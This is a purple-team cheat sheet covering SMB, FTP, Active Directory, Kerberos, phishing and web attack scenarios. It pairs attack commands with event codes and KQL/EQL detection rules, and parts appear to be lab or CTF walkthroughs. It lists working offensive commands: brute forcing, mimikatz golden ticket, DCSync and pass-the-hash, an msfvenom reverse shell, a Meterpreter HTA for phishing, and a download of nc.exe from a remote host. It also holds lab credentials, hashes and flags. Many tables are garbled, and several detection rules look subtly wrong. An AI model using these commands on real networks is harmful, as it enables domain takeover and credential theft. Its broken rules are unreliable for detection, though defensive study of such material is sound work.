Purple Teaming

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Purple Team Cheat Sheet: SMB Attacks and Detection

SMB Attack Commands

Attack TypeCommandDescription

Enumerating Shares

smbclient -L \\\\TARGET_IP

Lists SMB shares on the target.

Null Session

rpcclient -U "" -N TARGET_IP

Connects to the target with a null session.

Brute Force

crackmapexec smb TARGET_IP -u users.txt -p passwords.txt

Brute-forces SMB credentials.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


An account was successfully logged on.



A logon was attempted using explicit credentials.



A network share object was checked to see whether client can be granted desired access.


Forensics Commands and Codes



Extracts timeline from forensic images.

psort.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Sorts events in the plaso file and outputs to CSV.

fls -r -m "/" image.E01 > bodyfile

Generates a body file from an image.

KQL Rule: Suspicious SMB Login

| where EventID == 4624 and LogonType == 3
| where AccountName != "known_good_account"
| project AccountName, IpAddress, TimeGenerated

EQL Rule: Excessive SMB Failures

sequence by AccountName, IpAddress
  [any where EventID == 4625]
  [any where EventID == 4625] by AccountName, IpAddress
| where sequence.count > 20

KQL Rule: Unusual SMB Traffic

| where Protocol == "SMB" and not(ipAddress in ("known_good_ip_list"))
| summarize Count = count() by IpAddress, Port
| where Count > threshold_value

Purple Team Cheat Sheet: FTP Attacks and Detection

FTP Attack Commands

Attack TypeCommandDescription

Anonymous Login

ftp TARGET_IP then enter anonymous as user

Attempts anonymous login to FTP server.

Brute Force

hydra -l user -P passlist.txt ftp://TARGET_IP

Brute-forces FTP credentials.

File Upload

ftp TARGET_IP then use put filename

Uploads a file to the FTP server.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


An account failed to log on.



A logon was attempted using explicit credentials.



The Windows Filtering Platform has permitted a connection.


Forensics Commands and Codes


tcpdump -i eth0 port 21 -w ftp_traffic.pcap

Captures FTP traffic on port 21.

plaso -o l2tcsv -f ftp_traffic.pcap -w output.csv

Processes pcap file with Plaso for timeline analysis.

grep -i 'ftp' forensic_image.raw

Searches for FTP-related strings in a forensic image.

KQL Rule: Suspicious FTP Login Attempts

| where EventID == 4625 and NetworkInformation.Protocol == "FTP"
| summarize Count = count() by AccountName, IpAddress
| where Count > threshold_value

EQL Rule: FTP Brute Force Detection

sequence by AccountName, IpAddress
  [any where EventID == 4625 and NetworkInformation.Protocol == "FTP"]
  [any where EventID == 4625 and NetworkInformation.Protocol == "FTP"] by AccountName, IpAddress
| where sequence.count > 20

KQL Rule: Unusual FTP File Uploads

| where EventID == 5156 and ApplicationInformation.ApplicationProtocol == "FTP"
| where NetworkInformation.Direction == "Outbound" and NetworkInformation.Port == 21
| summarize Count = count() by FileName, IpAddress
| where Count > threshold_value

Attack Techniques and Commands

Attack TechniqueCommandDescription

LLMNR Poisoning

Responder -I eth0 -wrf

Uses Responder to poison LLMNR requests.

AS-REP Roasting

GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile asrep_hashes

Extracts AS-REP hashes for users without pre-authentication.


Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)

Forces a password change for a domain user.


Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All

Modifies permissions for a domain object.

Password Spraying

crackmapexec smb DOMAIN -u users.txt -p 'Password123' --continue-on-success

Attempts to log in with a common password.


.\RunForrestRun.exe -Domain DOMAIN -User user -Password 'Password123'

Executes RunForrestRun for lateral movement.

Abusing Vulnerable GPO

New-GPOImmediateTask -Name "MaliciousTask" -Command "cmd.exe" -Arguments "/c evil_script.bat"

Creates a GPO to run a malicious task.

Abusing MSSQL Service

Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "net localgroup Administrators /add DOMAIN\user"

Executes a command via SQL Server.

Abusing Domain Trusts

Get-DomainTrustMapping -API

Enumerates and abuses domain trusts.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


A computer account was changed.



An account was successfully logged on.



Special privileges assigned to new logon.



A new process has been created.



A network share object was checked.


Forensics Commands and Codes


tcpdump -i eth0 port 445 or port 139 -w smb_traffic.pcap

Captures SMB traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: LLMNR Poisoning Detection

| where EventID == 5145 and ShareName == '\\*\\IPC$'
| summarize Count = count() by AccountName, IpAddress
| where Count > threshold_value

EQL Rule: AS-REP Roasting Activity

sequence by AccountName
  [any where EventID == 4768 and TicketOptions == '0x40810000']
  [any where EventID == 4769] by AccountName
| where sequence.count > 5

KQL Rule: Unusual Process Execution

| where EventID == 4688 and NewProcessName contains 'RunForrestRun.exe'
| project AccountName, NewProcessName, CommandLine

Attack Techniques and Commands

Attack TechniqueCommandDescription

Service Permission

sc.exe sdset SERVICE_NAME DACL_string

Modifies service permissions.


Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)

Forces a password change for a domain user.

Abuse ACLs

Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All

Modifies ACLs for domain objects.

Abuse SQL Instance

Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"

Executes commands via SQL Server instance.

Abuse Service

sc.exe create evilservice binPath= "cmd.exe /c evil_script.bat"

Creates a malicious service.

Pass the Ticket

mimikatz.exe "kerberos::ptt ticket.kirbi"

Uses stolen Kerberos tickets for authentication.

Golden Ticket

mimikatz.exe "kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_HASH /id:500"

Creates a Golden Ticket for domain persistence.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


Special privileges assigned to new logon.



A new process has been created.



A member was added to a security-enabled global group.



Kerberos Authentication Ticket (TGT) was requested.



Kerberos Service Ticket (TGS) was requested.


Forensics Commands and Codes


tcpdump -i eth0 port 88 -w kerberos_traffic.pcap

Captures Kerberos traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Service Creation

| where EventID == 4688 and NewProcessName contains 'sc.exe'
| where CommandLine contains 'create' and CommandLine contains 'binPath='
| project AccountName, NewProcessName, CommandLine

EQL Rule: Abnormal Kerberos Ticket Requests

sequence by AccountName
  [any where EventID == 4768]
  [any where EventID == 4769] by AccountName
| where sequence.count > threshold_value

KQL Rule: Suspicious ACL Modifications

| where EventID == 4728 or EventID == 4732 or EventID == 4756
| where MemberName contains 'Attacker' or MemberSid contains 'S-1-5-21'
| project TimeGenerated, MemberName, TargetUserName, TargetDomainName

Attack Techniques and Commands

Attack TechniqueCommandDescription

Always Elevated

Set-ADObject -Identity user -Replace @{msDS-AllowedToActOnBehalfOfOtherIdentity='SDDL_string'}

Modifies AD object to grant elevated privileges.

Constrained Delegation

Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker

Sets constrained delegation on a target computer.

Unconstrained Delegation Print Bug

Rubeus.exe monitor /interval:30 /nowrap

Monitors for TGTs if unconstrained delegation is enabled.

Cross Trust

Get-DomainTrust -Domain target_domain

Enumerates trust relationships between domains.

Abuse MSSQL Service

Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"

Executes commands via SQL Server instance.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


Special privileges assigned to new logon.



Kerberos Authentication Ticket (TGT) was requested.



Kerberos Service Ticket (TGS) was requested.



An account was successfully logged on.



A network share object was checked.


Forensics Commands and Codes


tcpdump -i eth0 port 88 -w kerberos_traffic.pcap

Captures Kerberos traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Privilege Escalation

| where EventID == 4672
| where AccountName != "known_good_accounts"
| project AccountName, TimeGenerated, ProcessName

EQL Rule: Suspicious Delegation Use

sequence by AccountName
  [any where EventID == 4768]
  [any where EventID == 4769] by AccountName
| where sequence.count > threshold_value

KQL Rule: Abnormal SQL Server Command Execution

| where EventID == 4688 and NewProcessName contains 'sqlservr.exe'
| where CommandLine contains 'malicious_command'
| project AccountName, NewProcessName, CommandLine

Attack Techniques and Commands

Attack TechniqueCommandDescription

Bypass AMSI


Disables AMSI in a PowerShell session.

Always Elevated

Set-ADObject -Identity user -Replace @{msDS-AllowedToActOnBehalfOfOtherIdentity='SDDL_string'}

Modifies AD object to grant elevated privileges.

Constrained Delegation

Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker

Sets constrained delegation on a target computer.

Pass the Ticket

mimikatz.exe "kerberos::ptt ticket.kirbi"

Uses stolen Kerberos tickets for authentication.

Abuse SQL Instance

Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"

Executes commands via SQL Server instance.

Abuse GPO

New-GPOImmediateTask -Name "MaliciousTask" -Command "cmd.exe" -Arguments "/c evil_script.bat"

Creates a GPO to run a malicious task.

DSync Attack

mimikatz.exe "lsadump::dcsync /user:domain\krbtgt"

Extracts credentials from AD using DCSync.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


PowerShell script block logging.



Special privileges assigned to new logon.



Kerberos Authentication Ticket (TGT) was requested.



A new process has been created.



A network share object was checked.


Forensics Commands and Codes


tcpdump -i eth0 port 88 -w kerberos_traffic.pcap

Captures Kerberos traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: AMSI Bypass Detection

| where EventID == 4104
| where ScriptBlockText contains 'amsiInitFailed'
| project TimeGenerated, Computer, AccountName, ScriptBlockText

EQL Rule: Unusual Kerberos Ticket Requests

sequence by AccountName
  [any where EventID == 4768]
  [any where EventID == 4769] by AccountName
| where sequence.count > threshold_value

KQL Rule: Suspicious SQL Command Execution

| where EventID == 4688 and NewProcessName contains 'sqlservr.exe'
| where CommandLine contains 'malicious_command'
| project AccountName, NewProcessName, CommandLine

Purple Team Cheat Sheet: Comprehensive Attack Scenario

Attack Techniques and Commands

Attack TechniqueCommandDescription

Map Scanning

nmap -sC -sV -oA map/result

Scans the target for open ports and services.

Gobuster Directory Scanning

gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50

Enumerates directories on the web server.

Gathering Usernames

Gather usernames manually and create a user.txt file

Collects usernames for further attacks.

Password Spraying

python3 atomizer.py owa pass.txt user.txt -i 0:0:01

Attempts to log in with common passwords.

Sending Phishing Emails

Use Outlook to send phishing emails and capture NTLMv2 hash with Responder

Executes a phishing campaign.

Cracking NTLMv2 Hash

hashcat -m 5600 hash /us/share/wordlists/rockyou.txt -force

Cracks captured NTLMv2 hashes.

PowerShell Remote Session

Soffsec_session = New-PSSession -ComputerName -Authentication Negotiate -Credential k.svensson

Establishes a remote PowerShell session.

Creating a Symlink

New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'

Creates a symbolic link to escalate privileges.

Using Check-File Command

Check-File C:\programdata\root\Desktop\root.txt

Checks for the presence of a specific file.

Transferring Files with nc.exe

iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'

Transfers files using nc.exe.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


An account was successfully logged on.



A new process has been created.



A network share object was checked.



A user account was created.



The audit log was cleared.


Forensics Commands and Codes


tcpdump -i eth0 port 80 -w http_traffic.pcap

Captures HTTP traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Network Traffic

| where DestinationPort == 80 or DestinationPort == 443
| summarize Count = count() by DestinationIP, DestinationPort
| where Count > threshold_value

EQL Rule: Suspicious Process Creation

sequence by Hostname, AccountName
  [process where EventID == 4688 and NewProcessName contains 'nc.exe']
  [process where EventID == 4688 and NewProcessName contains 'powershell.exe'] by Hostname, AccountName
| where sequence.count > 5

KQL Rule: Abnormal File Access

| where EventID == 5145
| where ShareName contains 'C$' or ShareName contains 'ADMIN$'
| project AccountName, ShareName, FileName, IpAddress

Purple Team Cheat Sheet: Web-Based Attack Scenario

Attack Techniques and Commands

Attack TechniqueCommandDescription

Nmap Scanning

nmap -sC -sV -oA nmap/result

Scans the target for open ports and services.

Web Enumeration with Wappalyzer

Use Wappalyzer to identify backend technologies

Identifies technologies used on the web server.

Analyzing .git Directory

Check the Gemfile in the git directory for Ruby and Gem versions

Analyzes the .git directory for sensitive information.

Exploiting Ruby on Rails

Use a Ruby on Rails exploit

Exploits vulnerabilities in Ruby on Rails.

Capturing Request in Burp

Capture the request and modify it with the exploit

Captures and modifies HTTP requests for exploitation.

Getting a Reverse Shell

Use netcat listener and send the exploit to get a reverse shell

Gains shell access on the target system.

Cracking Password Hashes

Use John the Ripper to crack password hashes found in /var/backups

Cracks password hashes to gain credentials.

Bypassing Two-Factor Authentication

Use the contents of .google_authenticator to bypass two-factor authentication

Bypasses 2FA using the .google_authenticator file.

Synchronizing Time for Exploit

Adjust the system time to match the timezone for the exploit to work

Synchronizes system time for time-based exploits.

Gaining Root Access with GTFOBins

sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access

Uses GTFOBins for privilege escalation.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


An account was successfully logged on.



A new process has been created.



A network share object was checked.



A user account was created.



The audit log was cleared.


Forensics Commands and Codes


tcpdump -i eth0 port 80 -w http_traffic.pcap

Captures HTTP traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Network Traffic

| where DestinationPort == 80 or DestinationPort == 443
| summarize Count = count() by DestinationIP, DestinationPort
| where Count > threshold_value

EQL Rule: Suspicious Process Creation

sequence by Hostname, AccountName
  [process where EventID == 4688 and NewProcessName contains 'nc.exe']
  [process where EventID == 4688 and NewProcessName contains 'powershell.exe'] by Hostname, AccountName
| where sequence.count > 5

KQL Rule: Abnormal File Access

| where EventID == 5145
| where ShareName contains 'C$' or ShareName contains 'ADMIN$'
| project AccountName, ShareName, FileName, IpAddress

Purple Team Cheat Sheet: Recon to Exploitation Scenario

Attack Techniques and Commands



Nmap Scanning

nmap -sV -sC -oN nmap

Scans the target for open ports and services.


File Analysis

file headv1\\Setup\\1.0.0.exe

Analyzes the executable file for type and content.


SMB Enumeration

smbclient -L \\\\

Enumerates SMB shares on the target.


SMB File Transfer

smbclient \\\\\\Software_Updates then get UAT_Testing_Procedures.pdf

Transfers files via SMB.


Crafting Malicious Binary

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=9001 -f exe -o "rspoof.exe"

Creates a reverse shell executable.


YML File Creation

Manual creation of latest.yml file

Creates a .yml file for the exploit.


SMB File Transfer

smbclient \\\\\\Software_Updates then put latest.yml

Uploads .yml file via SMB.


Reverse Shell

Use Metasploit to listen for the reverse shell

Listens for an incoming reverse shell connection.


Redis Exploitation

redis-cli -h then get pk:urn:user:e8e29158-d70d-44b1-alba-4949d52790a0

Exploits Redis to retrieve data.


Password Decryption

python3 decrypt.py with the script provided in the summary

Decrypts a password using a provided script.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


An account was successfully logged on.



A new process has been created.



A network share object was checked.



The audit log was cleared.



Kerberos Authentication Ticket (TGT) was requested.


Forensics Commands and Codes


tcpdump -i eth0 port 445 -w smb_traffic.pcap

Captures SMB traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual SMB Traffic

| where EventID == 5145
| where ShareName contains 'Software_Updates'
| project AccountName, ShareName, FileName, IpAddress

EQL Rule: Suspicious Process Execution

sequence by Hostname, AccountName
  [process where EventID == 4688 and NewProcessName contains 'rspoof.exe']
  [process where EventID == 4688 and NewProcessName contains 'redis-cli'] by Hostname, AccountName
| where sequence.count > 2

KQL Rule: Abnormal File Access Patterns

| where EventID == 5145
| where FileName contains 'latest.yml' or FileName contains 'UAT_Testing_Procedures.pdf'
| project TimeGenerated, AccountName, FileName, IpAddress

Purple Team Cheat Sheet: Credential and Connection Scenario

Attack Techniques and Commands


Credential Dumping

Enumerating Credentials

Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force

Enumerates credentials on WSO2.

Credential Dumping

Using Mimikatz

Upload mimikatz.exe and execute sekurlsa::dpapi to get the master key

Dumps credentials using Mimikatz.

Credential Decryption

Decrypting Credentials

dpapi::cred /in: C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey: 40fc84

Decrypts credentials.

Port Forwarding

Setting up Port Forwarding

portfwd add -L -I -l 3389 -p 3389

Sets up port forwarding.

RDP Connection

Connecting via RDP with Remmina

Install Remmina, import sq101.rdp, change host, export to rdp file

Connects via RDP using Remmina.

RDP Connection

Using FreeRDP

xfreerdp sql.rdp /u: epugh_adm /d:rastalabs.local

Connects via RDP using FreeRDP.

Detection: Event Codes, KQL/EQL, Sysmon, and Wazuh Rules

Event CodeDescriptionKQL/EQL RuleSysmon/Wazuh Rule


An account was successfully logged on.


where EventID == 4624`


A new process has been created.


where EventID == 4688`


A network share object was checked.


where EventID == 5145`


Special privileges assigned to new logon.


where EventID == 4672`


RDP Connection Attempt.


where DestinationPort == 3389`

Forensics Commands and Codes


tcpdump -i eth0 port 3389 -w rdp_traffic.pcap

Captures RDP traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Credential Access

| where EventID == 4688 and NewProcessName contains 'mimikatz.exe'
| project TimeGenerated, AccountName, NewProcessName, CommandLine

EQL Rule: Suspicious RDP Activity

sequence by Hostname, AccountName
  [network where DestinationPort == 3389]
  [process where EventID == 4688 and NewProcessName contains 'xfreerdp'] by Hostname, AccountName
| where sequence.count > 2

Sysmon/Wazuh Rule: Mimikatz Execution Detection

- rule.id: 1
  field: process.name
  value: mimikatz.exe

Purple Team Cheat Sheet: Credential and Exploitation Scenario

Attack Techniques and Commands


Credential Enumeration

Finding LAPS Group Members

Enumeration to find ngodfrey_adm is part of LAPS group on WS05

Identifies LAPS group members.

Credential Access

Dumping Credentials with PowerSploit

powershell -ep bypass then Import-module /PowerSploit.psd1

Dumps credentials using PowerSploit.

Credential Access

Using Credentials for Access

$SecPassword = ConvertTo-SecureString "J5KCwKruINyCJBKd1dZU" -AsPlainText -Force then $cred = New-Object System.Management.Automation.PSCredential ('rastalabs.local\\ngodfrey_adm', $SecPassword)

Uses dumped credentials for access.

Credential Access

Getting AD Object with Credentials

Get-ADObject -Name web01 -DomainController -Credential $Cred

Retrieves AD objects using credentials.

Local Admin Passwords

Retrieving Local Admin Passwords

Passwords are listed for WS01, WS02, WSO3, WSO4, WSO5

Retrieves local admin passwords.

Port Forwarding

Setting up Port Forwarding with Meterpreter

portfwd add -L -I -l 447 -p 445 and similar for other ports

Sets up port forwarding using Meterpreter.


Using MS17-010 Exploit

exploit/windows/smb/ms17_010_psexec with lport 80, 443, 8080

Exploits MS17-010 for admin shell.

Flag Retrieval

Retrieving Flags

Flags are RASTA{3v3rybOdy_10v35_14p5}, RASTA-wh3¼3_w45_2£4_!?3, RASTA-50m371m35.yOu_mu57_b4ck714ck}

Retrieves flags from WS02 and WS04.


Running Mimikatz

privilege::debug then sekurlsa::logonPasswords

Runs Mimikatz on WS02 to dump credentials.

Detection: Event Codes and KQL Rules

Event CodeDescriptionKQL Rule


An account was successfully logged on.



A new process has been created.



A network share object was checked.



Special privileges assigned to new logon.



A new service was installed.


Forensics Commands and Codes


tcpdump -i eth0 port 445 -w smb_traffic.pcap

Captures SMB traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Credential Access

| where EventID == 4688 and NewProcessName contains 'powershell.exe'
| where CommandLine contains 'ConvertTo-SecureString' or CommandLine contains 'Get-ADObject'
| project TimeGenerated, AccountName, NewProcessName, CommandLine

KQL Rule: Suspicious Port Forwarding Activity

| where EventID == 4688 and NewProcessName contains 'portfwd.exe'
| project TimeGenerated, AccountName, NewProcessName, CommandLine

KQL Rule: Exploitation Attempts Detection

| where EventID == 7045 and ServiceName contains 'ms17_010_psexec'
| project TimeGenerated, ServiceName, ServiceFileName

Purple Team Cheat Sheet: Phishing to Network Recon Scenario

Attack Techniques and Commands



Creating Phishing HTA

python unicorn.py windows/meterpreter/reverse_https 443 hta

Generates a phishing HTA file.

Web Server Setup

Hosting HTA on Apache2

copy index.html launcher.hta /var/www/html; service apache2 start

Hosts the HTA file on Apache2 server.

Listener Setup

Setting up Metasploit Listener

msfconsole -r unicorn.rc

Sets up a listener in Metasploit.

Share Enumeration

Viewing Shares on Network

net share

Enumerates shared resources on the network.

User Enumeration

Displaying Domain User Accounts

net user /domain

Lists user accounts on the domain.

User Information

Viewing User Info

net user [username] /domain

Displays information about a specific domain user.

Group Enumeration

Viewing Domain Group Members

net group finance /domain

Lists members of a specific domain group.

Drive Enumeration

Listing Logical Drives

fsutil fsinfo drives; wmic logicaldisk get name; diskpart > list volume

Enumerates logical drives on the system.

Network Recon

Pinging Servers for IP Addresses

ping DC01; ping FS01; ...; ping WS05

Pings servers to discover IP addresses.

Flag Retrieval

Accessing the Flag

Flag is XYZ located in M:\\Documents

Retrieves a flag from a specified location.

KeePass Database

Found KeePass Database and Key File

Located KeePass database and key file

Identifies KeePass database and key file.

Detection: Event Codes and KQL Rules

Event CodeDescriptionKQL Rule


An account was successfully logged on.



A new process has been created.



A network share object was checked.



Kerberos Authentication Ticket (TGT) was requested.



The audit log was cleared.


Forensics Commands and Codes


tcpdump -i eth0 port 80 -w http_traffic.pcap

Captures HTTP traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL Rules for Detecting Malicious Patterns

KQL Rule: Suspicious Web Server Activity

| where EventID == 4688 and NewProcessName contains 'apache2'
| project TimeGenerated, AccountName, NewProcessName, CommandLine

KQL Rule: Unusual Network Share Access

| where EventID == 5145
| where ShareName != 'known_good_shares'
| project TimeGenerated, AccountName, ShareName, FileName, IpAddress

KQL Rule: Abnormal User Enumeration Activity

| where EventID == 4688 and CommandLine contains 'net user' and CommandLine contains '/domain'
| project TimeGenerated, AccountName, CommandLine

Attack Techniques and Commands


Credential Use

Using epugh_adm Credentials

Log in to web01 ( and then RDP to sq101 ( using epugh_adm creds

Uses credentials to access multiple systems.

Lateral Movement

RDP with gopikrishna

RDP to fs01 with user gopikrishna [local admin]

Uses RDP for lateral movement.

Malware Execution

Running pOwnedshell.exe

Run pOwnedshell.exe with admin cmd

Executes malware with administrative privileges.

Credential Dumping

Invoke Mimikatz from pOwnedshell

Use option 4 in pOwnedshell, invoke Mimikatz to get rweston_da NTLM hash

Dumps credentials using Mimikatz.

Credential Use

Pass-the-Hash with Mimikatz

sekurlsa::pth /user: rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa

Uses pass-the-hash technique for authentication.

Golden Ticket Attack

Perform DCSync

Use option 10 in pOwnedshell, perform DCSync

Extracts krbtgt hash for Golden Ticket creation.

Golden Ticket Attack

Generate Golden Ticket

kerberos::golden /domain:rastalabs.local /user: rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a235717938a8bbcebib /ticket:C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket

Creates a Golden Ticket for domain access.

Golden Ticket Attack

Use Golden Ticket

kerberos::ptt C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket

Uses the Golden Ticket for authentication.

Detection: Event Codes and KQL Rules

Event CodeDescriptionKQL Rule


An account was successfully logged on.



A new process has been created.



A network share object was checked.



Kerberos Authentication Ticket (TGT) was requested.



Special privileges assigned to new logon.


Forensics Commands and Codes


tcpdump -i eth0 port 3389 -w rdp_traffic.pcap

Captures RDP traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL Rules for Detecting Malicious Patterns

KQL Rule: Suspicious RDP Activity

| where EventID == 4624 and LogonType == 10
| where AccountName == "gopikrishna" or AccountName == "epugh_adm"
| project TimeGenerated, AccountName, IpAddress

KQL Rule: Abnormal Process Execution

| where EventID == 4688 and NewProcessName contains 'pOwnedshell.exe'
| project TimeGenerated, AccountName, NewProcessName, CommandLine

KQL Rule: Golden Ticket Usage Detection

| where EventID == 4768 and TicketOptions has '0x40810000'
| project TimeGenerated, AccountName, ServiceName, TicketOptions

Purple Team Cheat Sheet: Golden Ticket Attack Scenario

Attack Technique and Command


Golden Ticket Attack

mimikatz.exe "kerberos::golden /user:Administrator /domain:yourdomain.com /sid:S-1-5-21-XXXXXX-XXXXXX-XXXXXX /krbtgt:XXXXXX /id:500 /ptt"

Generates a Golden Ticket using Mimikatz.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


Kerberos TGT Requested



Special Privileges Assigned to New Logon



Successful Account Logon


Forensics Commands and Codes


log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

tcpdump -i eth0 port 88 -w kerberos_traffic.pcap

Captures Kerberos traffic for analysis.

Full Raw KQL/EQL Rules for Detecting Golden Ticket Usage

KQL Rule: Unusual Kerberos Ticket Granting Ticket Requests

| where EventID == 4768
| where TicketOptions has '0x40810000'
| project TimeGenerated, AccountName, ServiceName, TicketOptions

EQL Rule: Anomalous Kerberos Privilege Assignments

sequence by AccountName
  [security where EventID == 4672]
  [security where EventID == 4768 and TicketOptions has '0x40810000'] by AccountName
| where sequence.count > 5

KQL Rule: Suspicious Logon Types

| where EventID == 4624 and LogonType == 3
| where AccountName == "Administrator" or AccountName == "unknown"
| project TimeGenerated, AccountName, LogonType, IpAddress

Purple Team Cheat Sheet: Silver Ticket Attack Scenario

Attack Technique and Command


Silver Ticket Attack

mimikatz.exe "kerberos::golden /user:User /domain:yourdomain.com /sid:S-1-5-21-XXXXXX-XXXXXX-XXXXXX /target:service.yourdomain.com /service:ServiceType /rc4:XXXXXX /ptt"

Generates a Silver Ticket for a specific service using Mimikatz.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


Kerberos Service Ticket (TGS) was requested



Special Privileges Assigned to New Logon



Successful Account Logon


Forensics Commands and Codes


log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

tcpdump -i eth0 port 88 -w kerberos_traffic.pcap

Captures Kerberos traffic for analysis.

Full Raw KQL/EQL Rules for Detecting Silver Ticket Usage

KQL Rule: Unusual Kerberos Service Ticket Requests

| where EventID == 4769
| where ServiceName !contains 'krbtgt'
| project TimeGenerated, AccountName, ServiceName, TicketOptions

EQL Rule: Anomalous Kerberos Service Ticket Assignments

sequence by AccountName
  [security where EventID == 4672]
  [security where EventID == 4769 and ServiceName !contains 'krbtgt'] by AccountName
| where sequence.count > 5

KQL Rule: Suspicious Logon Types

| where EventID == 4624 and LogonType == 3
| where AccountName == "specific_user" or AccountName == "unknown"
| project TimeGenerated, AccountName, LogonType, IpAddress

Purple Team Cheat Sheet: Kerberoasting Attack Scenario

Attack Technique and Command



GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>

Uses GetUserSPNs.py to request service tickets for service accounts.


mimikatz.exe "kerberos::list /export"

Uses Mimikatz to list and export service tickets.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


Kerberos Service Ticket (TGS) was requested



Special Privileges Assigned to New Logon


Forensics Commands and Codes


tcpdump -i eth0 port 88 -w kerberos_traffic.pcap

